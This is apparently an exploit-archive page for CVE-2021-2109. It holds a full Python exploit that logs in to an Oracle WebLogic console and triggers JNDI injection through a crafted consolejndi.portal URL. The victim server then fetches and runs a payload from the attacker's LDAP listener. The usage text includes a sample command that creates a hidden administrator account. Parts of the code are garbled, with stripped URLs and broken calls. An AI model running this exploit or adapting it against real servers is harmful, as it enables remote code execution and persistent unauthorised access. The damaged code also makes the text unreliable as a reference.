oracle weblogic server rce (authenticated)
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# Exploit Title: Oracle WebLogic Server - RCE (Authenticated) # Date: 2021-01-21 # Exploit Author: Photubias # Vendor Advisory: [1] # Vendor Homepage: # Version: WebLogic,,,, (fixed in JDKs 6u201, 7u191, 8u182 & 11.0.1) # Tested on: WebLogic with JDK-8u181 on Windows 10 20H2 # CVE: CVE-2021-2109 #!/usr/bin/env python3 ''' Copyright 2021 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <>. File name written by tijl[dot]deneut[at]howest[dot]be for This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) Requires JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar from to be in the same folder ''' import urllib.request, urllib.parse, http.cookiejar, ssl import sys, os, optparse, subprocess, threading, time ## Static vars; change at will, but recommend leaving as is sURL = '' iTimeout = 5 oRun = None ## Ignore unsigned certs, if any because WebLogic is default HTTP ssl._create_default_https_context = ssl._create_unverified_context class runJar(threading.Thread): def __init__(self, sJarFile, sCMD, sAddress): self.stdout = [] self.stderr = '' self.cmd = sCMD self.addr = sAddress self.jarfile = sJarFile self.proc = None threading.Thread.__init__(self) def run(self): self.proc = subprocess.Popen(['java', '-jar', self.jarfile, '-C', self.cmd, '-A', self.addr], shell=False, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines=True) for line in iter(self.proc.stdout.readline, ''): self.stdout.append(line) for line in iter(self.proc.stderr.readline, ''): self.stderr += line def findJNDI(): sCurDir = os.getcwd() sFile = '' for file in os.listdir(sCurDir): if 'JNDI' in file and '.jar' in file: sFile = file print('[+] Found and using ' + sFile) return sFile def findJAVA(bVerbose): try: oProc = subprocess.Popen('java -version', stdout = subprocess.PIPE, stderr = subprocess.STDOUT) except: exit('[-] Error: java not found, needed to run the JAR file\n Please make sure to have "java" in your path.') sResult = list(oProc.stdout)[0].decode() if bVerbose: print('[+] Found Java: ' + sResult) def checkParams(options, args): if args: sHost = args[0] else: sHost = input('[?] Please enter the URL ['+sURL+'] : ') if sHost == '': sHost = sURL if sHost[-1:] == '/': sHost = sHost[:-1] if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost if options.username: sUser = options.username else: sUser = input('[?] Username [weblogic] : ') if sUser == '': sUser = 'weblogic' if options.password: sPass = options.password else: sPass = input('[?] Password [Passw0rd-] : ') if sPass == '': sPass = 'Passw0rd-' if options.command: sCMD = options.command else: sCMD = input('[?] Command to run [calc] : ') if sCMD == '': sCMD = 'calc' if options.listenaddr: sLHOST = options.listenaddr else: sLHOST = input('[?] Local IP to connect back to [] : ') if sLHOST == '': sLHOST = '' if options.verbose: bVerbose = True else: bVerbose = False return (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) def startListener(sJarFile, sCMD, sAddress, bVerbose): global oRun oRun = runJar(sJarFile, sCMD, sAddress) oRun.start() print('[!] Starting listener thread and waiting 3 seconds to retrieve the endpoint') oRun.join(3) if not oRun.stderr == '': exit('[-] Error starting Java listener:\n' + oRun.stderr) bThisLine=False if bVerbose: print('[!] For this to work, make sure your firewall is configured to be reachable on 1389 & 8180') for line in oRun.stdout: if bThisLine: return line.split('/')[3].replace('\n','') if 'JDK 1.8' in line: bThisLine = True def endIt(): global oRun print('[+] Closing threads') if oRun: oRun.proc.terminate() exit(0) def main(): usage = ( 'usage: %prog [options] URL \n' ' Make sure to have "JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"\n' ' in the current working folder\n' 'Get it here:\n' 'Only works when hacker is reachable via an IPv4 address\n' 'Use "whoami" to just verify the vulnerability (OPSEC safe but no output)\n' 'Example: -u weblogic -p Passw0rd -c calc -l\n' 'Sample payload as admin: cmd /c net user pwned Passw0rd- /add & net localgroup administrators pwned /add' ) parser = optparse.OptionParser(usage=usage) parser.add_option('--username', '-u', dest='username') parser.add_option('--password', '-p', dest='password') parser.add_option('--command', '-c', dest='command') parser.add_option('--listen', '-l', dest='listenaddr') parser.add_option('--verbose', '-v', dest='verbose', action="store_true", default=False) ## Get or ask for the vars (options, args) = parser.parse_args() (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) = checkParams(options, args) ## Verify Java and JAR file sJarFile = findJNDI() findJAVA(bVerbose) ## Keep track of cookies between requests cj = http.cookiejar.CookieJar() oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) print('[+] Verifying reachability') ## Get the cookie oRequest = urllib.request.Request(url = sHost + '/console/') oResponse =, timeout = iTimeout) for c in cj: if == 'ADMINCONSOLESESSION': if bVerbose: print('[+] Got cookie "' + c.value + '"') ## Logging in lData = {'j_username' : sUser, 'j_password' : sPass, 'j_character_encoding' : 'UTF-8'} lHeaders = {'Referer' : sHost + '/console/login/LoginForm.jsp'} oRequest = urllib.request.Request(url = sHost + '/console/j_security_check', data = urllib.parse.urlencode(lData).encode(), headers = lHeaders) oResponse =, timeout = iTimeout) sResult ='ignore').split('\r\n') bSuccess = True for line in sResult: if 'Authentication Denied' in line: bSuccess = False if bSuccess: print('[+] Succesfully logged in!\n') else: exit('[-] Authentication Denied') ## Launch the LDAP listener and retrieve the random endpoint value sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose) if bVerbose: print('[+] Got Java value: ' + sRandom) ## This is the actual vulnerability, retrieve LDAP data from victim which the runs on victim, it bypasses verification because IP is written as "127.0.0;1" instead of "" print('\n[+] Firing exploit now, hold on') ##;10:1389/5r5mu7;AdminServer-) sConvertedIP = sLHOST.split('.')[0] + '.' + sLHOST.split('.')[1] + '.' + sLHOST.split('.')[2] + ';' + sLHOST.split('.')[3] sFullUrl = sHost + r'/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://' + sConvertedIP + ':1389/' + sRandom + r';AdminServer%22)' if bVerbose: print('[!] Using URL ' + sFullUrl) oRequest = urllib.request.Request(url = sFullUrl, headers = lHeaders) oResponse =, timeout = iTimeout) time.sleep(5) bExploitWorked = False for line in oRun.stdout: if 'Log a request' in line: bExploitWorked = True if 'BypassByEl' in line: print('[-] Exploit failed, wrong SDK on victim') if not bExploitWorked: print('[-] Exploit failed, victim likely patched') else: print('[+] Victim vulnerable, exploit worked (could be as limited account!)') if bVerbose: print(oRun.stderr) endIt() if __name__ == "__main__": try: main() except KeyboardInterrupt: endIt()
Oracle weblogic server rce (authenticated) Vulnerability / Exploit Source : Oracle weblogic server rce (authenticated)